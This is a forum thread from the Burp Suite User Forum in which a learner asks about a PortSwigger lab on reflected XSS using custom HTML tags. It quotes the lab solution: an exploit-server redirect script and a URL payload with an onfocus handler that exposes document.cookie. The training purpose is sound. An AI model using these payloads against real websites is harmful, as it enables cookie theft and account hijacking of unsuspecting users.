Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab Solution clarification

Suomynona | Last updated: Feb 07, 2022 06:21AM UTC

Lab: "Reflected XSS into HTML context with all tags blocked except custom ones" <a href=https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-all-standard-tags-blocked>https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-all-standard-tags-blocked</a> I would like some help understanding what I'm missing... Is this method any different than manually putting in the url this: https://your-lab-id.web-security-academy.net/?=<xss+id=x+onfocus=alert(document.cookie)%20tabindex=1>#x Also, side-note, the solution seems a bit finicky, and wasn't accepted at first, not to mention the fact that the alert doesn't come up even when it says it was solved/when you view the solved version. Could anyone tell me why? I apologize as I'm rather new to XSS and may need thorough explanations. **SPOILERS** Solution says: 1. Go to the exploit server and paste the following code, replacing your-lab-id with your lab ID: <script> location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script> 2. Click "Store" and "Deliver exploit to victim". This injection creates a custom tag with the ID x, which contains an onfocus event handler that triggers the alert function. The hash at the end of the URL focuses on this element as soon as the page is loaded, causing the alert payload to be called.

James, PortSwigger Agent | Last updated: Feb 08, 2022 10:31AM UTC

Hello,

Thanks for your message.

I have checked this lab and it is working as expected. The solution was accepted on the first attempt and the alert came up when viewing the exploit.

How this lab works is that the exploit server delivers your payload to a simulated "victim", who visits the page. You can see this in the "access log" and confirm the "victim" has visited the exploited page.

Please check the community solution video for the lab for an example of the steps.

Here is a link to learn more about XSS: https://portswigger.net/web-security/cross-site-scripting

Suomynona | Last updated: Feb 08, 2022 11:08PM UTC

Thank you, though I would like to know the real world scenario equivalent to utilizing the "exploit server" feature. And how that differs from manually putting it in the url.

James, PortSwigger Agent | Last updated: Feb 09, 2022 02:39PM UTC